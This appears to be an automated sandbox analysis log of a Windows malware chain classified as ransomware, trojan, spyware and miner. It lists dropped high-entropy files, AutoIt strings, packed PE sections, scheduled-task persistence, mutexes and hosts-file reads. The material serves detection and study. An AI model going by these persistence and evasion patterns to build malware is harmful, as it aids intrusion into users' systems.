Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Mel entropy: 7.99794312328 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Bermuda entropy: 7.99769968887 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Strange entropy: 7.9975954959 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Contained entropy: 7.99790073897 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Republicans entropy: 7.99777484468 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Candidates entropy: 7.99829105993 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Webmaster entropy: 7.99788262642 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Fw entropy: 7.99797300074 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Tests entropy: 7.99627419907 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Wow entropy: 7.99697827646 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Parameter entropy: 7.99696880805 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Falls entropy: 7.99738773097 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Streams entropy: 7.99736186351 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Tablets entropy: 7.99711590621 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Participation entropy: 7.99725207434 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Principal entropy: 7.99757779963 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Raise entropy: 7.99800125439 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\More entropy: 7.99724972509 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Optimum entropy: 7.99778496784 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Thursday entropy: 7.99781638581 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\All entropy: 7.99802850254 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Cameras entropy: 7.99773849221 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Editor entropy: 7.99711578224 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Remedy entropy: 7.9979759857 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Users\user\AppData\Local\Temp\Courts entropy: 7.99677164721 Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\662510\A entropy: 7.99995042456 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com File created: C:\Users\user\AppData\Local\GuardTech Solutions\K entropy: 7.99995042456 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe File created: C:\Users\user\AppData\Local\Temp\Los entropy: 7.99768365381 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe File created: C:\Users\user\AppData\Local\Temp\Become entropy: 7.99784070507 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe File created: C:\Users\user\AppData\Local\Temp\Howard entropy: 7.99757648221 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe File created: C:\Users\user\AppData\Local\Temp\Vermont entropy: 7.99725611197 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe File created: C:\Users\user\AppData\Local\Temp\Bt entropy: 7.99648411738 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe File created: C:\Users\user\AppData\Local\Temp\Vatican entropy: 7.9972950771 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe File created: C:\Users\user\AppData\Local\Temp\Mental entropy: 7.99804736681 Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\768032\G entropy: 7.99966998402 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com File created: C:\Users\user\AppData\Local\InnoSphere Dynamics\l entropy: 7.99966998402 Jump to dropped file

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: 04dc07bf76.exe, 0000002B.00000002.3387714207.00000000003B2000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_fdcf591e-8
Source: 04dc07bf76.exe, 0000002B.00000002.3387714207.00000000003B2000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_c6faa910-e
Source: 04dc07bf76.exe, 00000032.00000002.3424173036.00000000003B2000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_d5eb9eec-4
Source: 04dc07bf76.exe, 00000032.00000002.3424173036.00000000003B2000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_203af4a2-1
Source: 04dc07bf76.exe.6.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_b5cef1b5-3
Source: 04dc07bf76.exe.6.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_3777b4e9-8
Drops large PE files
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe File dump: service123.exe.7.dr 314617856 Jump to dropped file
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: c7f41aa061.exe.6.dr Static PE information: section name:
Source: c7f41aa061.exe.6.dr Static PE information: section name: .idata
Source: random[2].exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name: .idata
Source: random[2].exe.6.dr Static PE information: section name:
Source: 3ee5495637.exe.6.dr Static PE information: section name:
Source: 3ee5495637.exe.6.dr Static PE information: section name: .idata
Source: 3ee5495637.exe.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: .rsrc
Source: random[1].exe1.6.dr Static PE information: section name: .idata
Source: random[1].exe1.6.dr Static PE information: section name:
Source: 779ae05f2f.exe.6.dr Static PE information: section name:
Source: 779ae05f2f.exe.6.dr Static PE information: section name: .rsrc
Source: 779ae05f2f.exe.6.dr Static PE information: section name: .idata
Source: 779ae05f2f.exe.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: .idata
Source: random[1].exe2.6.dr Static PE information: section name:
Source: 3907f97605.exe.6.dr Static PE information: section name:
Source: 3907f97605.exe.6.dr Static PE information: section name: .idata
Source: 3907f97605.exe.6.dr Static PE information: section name:
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Code function: 9_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx, 9_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Code function: 22_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx, 22_2_004038AF
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Windows\LockedJenny Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Windows\WineDescription Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Windows\UkWilling Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe File created: C:\Windows\CellsPaperbacks Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe File created: C:\Windows\ThouRevolution
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Code function: 9_2_0040737E 9_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Code function: 9_2_00406EFE 9_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Code function: 9_2_004079A2 9_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Code function: 9_2_004049A8 9_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Code function: 22_2_0040737E 22_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Code function: 22_2_00406EFE 22_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Code function: 22_2_004079A2 22_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Code function: 22_2_004049A8 22_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014DA0BC 31_3_014DA0BC
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014C5550 31_3_014C5550
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014C5550 31_3_014C5550
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014C5550 31_3_014C5550
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014C5550 31_3_014C5550
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014C5550 31_3_014C5550
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014C5550 31_3_014C5550
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014C5550 31_3_014C5550
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014C5550 31_3_014C5550
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 31_3_014C5550 31_3_014C5550
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_0024F002 40_1_0024F002
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_000DF424 40_1_000DF424
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_00243414 40_1_00243414
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_00240C70 40_1_00240C70
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_0025247A 40_1_0025247A
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_0015B693 40_1_0015B693
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_0024A0AD 40_1_0024A0AD
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_00250AB8 40_1_00250AB8
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_0023E2E9 40_1_0023E2E9
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_0024BAF0 40_1_0024BAF0
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_002574CD 40_1_002574CD
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_00241964 40_1_00241964
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_00248551 40_1_00248551
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_0024D5A9 40_1_0024D5A9
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_002559B3 40_1_002559B3
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_00253F84 40_1_00253F84
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_0012FDB8 40_1_0012FDB8
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_000FFFB9 40_1_000FFFB9
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_001CE1A4 40_1_001CE1A4
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_00244FC3 40_1_00244FC3
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_001339F8 40_1_001339F8
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_002469D5 40_1_002469D5
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_002349D1 40_1_002349D1
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Code function: 40_1_0027EFF7 40_1_0027EFF7
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Code function: String function: 004062CF appears 57 times
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Code function: String function: 004062CF appears 58 times
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9982491059264306
Source: file.exe Static PE information: Section: hukqwfqu ZLIB complexity 0.9943376140021459
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982491059264306
Source: skotes.exe.0.dr Static PE information: Section: hukqwfqu ZLIB complexity 0.9943376140021459
Source: random[2].exe.6.dr Static PE information: Section: kzyuzjct ZLIB complexity 0.9946100634305682
Source: 3ee5495637.exe.6.dr Static PE information: Section: kzyuzjct ZLIB complexity 0.9946100634305682
Source: random[1].exe1.6.dr Static PE information: Section: ozcvkfvj ZLIB complexity 0.9943587005395683
Source: 779ae05f2f.exe.6.dr Static PE information: Section: ozcvkfvj ZLIB complexity 0.9943587005395683
Source: random[1].exe2.6.dr Static PE information: Section: ZLIB complexity 0.9992699795081967
Source: random[1].exe2.6.dr Static PE information: Section: fwtvsnnj ZLIB complexity 0.9945599099864131
Source: 3907f97605.exe.6.dr Static PE information: Section: ZLIB complexity 0.9992699795081967
Source: 3907f97605.exe.6.dr Static PE information: Section: fwtvsnnj ZLIB complexity 0.9945599099864131
Source: random[1].exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: c7f41aa061.exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.rans.troj.spyw.expl.evad.mine.winEXE@125/134@32/9
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Code function: 9_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 9_2_004044D1
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Code function: 9_2_004024FB CoCreateInstance, 9_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7272:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4116:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3736:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5132:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2992:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2932:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3844:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
